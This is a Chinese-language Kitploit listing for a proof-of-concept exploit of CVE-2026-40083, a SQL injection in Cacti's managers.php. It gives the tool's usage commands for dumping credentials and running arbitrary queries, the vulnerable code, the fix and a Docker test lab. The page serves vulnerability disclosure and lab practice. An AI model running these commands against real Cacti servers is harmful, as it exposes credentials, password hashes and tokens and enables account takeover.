Skip to content
KitploitKITPLOIT
工具漏洞利用博客
Log in
提交
工具漏洞利用博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2026-40083 — 针对CVE-2026-40083的概念验证漏洞利用,Cacti的managers.php中存在SQL注入,允许经过身份验证的用户提取MySQL数据库、用户凭据和密码哈希。包含用于测试的Docker实验室。 | Kitploit
工具/GitHubGitHub/hakaioffsec/cve-2026-40083
漏洞分析漏洞利用Web应用程序漏洞利用渗透测试学习与教育数据库安全实验室与实践
GitHubhakaioffsec/cve-2026-40083

CVE-2026-40083

针对CVE-2026-40083的概念验证漏洞利用,Cacti的managers.php中存在SQL注入,允许经过身份验证的用户提取MySQL数据库、用户凭据和密码哈希。包含用于测试的Docker实验室。

查看仓库
2163个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

Cacti managers.php 中的 SQL 注入

针对 CVE-2026-40083 的概念验证漏洞利用程序,这是 Cacti managers.php 中的一个 SQL 注入漏洞,允许任何具有 SNMP Manager 权限的已认证用户读取整个 MySQL 数据库,包括用户凭据和密码哈希。

用法:

# Verify injection (time-based)
$ python3 exploit/poc.py --url http://TARGET --user admin --password admin

# Dump specific user credentials
$ python3 exploit/poc.py --url http://TARGET --user admin --password admin --target-id 1

# Extract arbitrary SQL query result
$ python3 exploit/poc.py --url http://TARGET --user admin --password admin --query "SELECT version()"

# Enumerate all users (scan IDs 1-50)
$ python3 exploit/poc.py --url http://TARGET --user admin --password admin --max-id 50

# With Burp proxy
$ python3 exploit/poc.py --url http://TARGET --user admin --password admin --proxy http://127.0.0.1:8080

受影响版本

  • Cacti ≤ 1.2.30(已在 1.2.31 中修复)

根本原因

在 managers.php 中,来自 selected_graphs_array 的用户输入通过 cacti_unserialize() 反序列化,并直接拼接到 SQL 中而未经任何清理:

$selected_items = cacti_unserialize(stripslashes(gnrv('selected_graphs_array')));

if ($selected_items != false) {
    // No validation - direct implode into SQL
    db_execute('DELETE FROM snmpagent_managers WHERE id IN (' . implode(',', $selected_items) . ')');
}

selected_graphs_array 参数接受一个 PHP 序列化数组。数组元素以逗号拼接后直接注入到 IN 子句中。

受影响端点

POST /managers.php (action=actions, drp_action=1|2|3)

影响

该 SQL 注入漏洞允许具有 SNMP Manager 权限的已认证用户在数据库上执行任意查询。这使攻击者能够读取包含用户数据、设置、设备凭据和 SNMP 团体名的数据表,并提取 bcrypt 哈希和 API 令牌,从而可能导致账户被攻破。此外,该缺陷还允许执行时间延迟命令,通过耗尽并发数据库连接可能导致拒绝服务。

CVSS

7.2 高危 CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

修复方案

提交 52032e760 在 implode 之前添加了 array_map('intval', $selected_items),将所有值转换为整数。

实验环境搭建

docker-compose up -d --build

等待约 30 秒完成初始化。通过 http://localhost:8088 访问 Cacti

默认凭据:admin / admin

# Test exploit
python3 exploit/poc.py --url http://localhost:8088 --user admin --password admin --target-id 1

免责声明

本工具仅用于教育和研究目的。请仅在你拥有或已获得明确测试许可的系统上使用。作者不对因使用本程序造成的任何滥用或损害负责。

QuimeraX Intelligence

QuimeraX Intelligence 是一个先进的 EASM 和网络威胁情报平台,专注于识别复杂系统中的关键漏洞。该平台主动监控、检测并提醒客户有关安全威胁,确保透明度并快速响应潜在风险。如果发现客户系统存在漏洞,客户会立即收到通知和全面的报告,以便采取保护措施。了解更多

Hakai Security

Hakai Security 是一家由安全专业人士创立的网络安全公司,致力于追求技术卓越。我们提供量身定制的安全解决方案,包括高级渗透测试、逼真的红队模拟和安全开发实践,以主动保护客户资产免受不断演变的网络威胁。

Hacking Club

Hacking Club 是一个培训平台,你可以通过由我们安全咨询公司的专家创建的实操课程、实验和挑战来学习网络安全知识:从战场直接到你的训练。通过 hacking club 练习本仓库中呈现的漏洞!了解更多

下载工具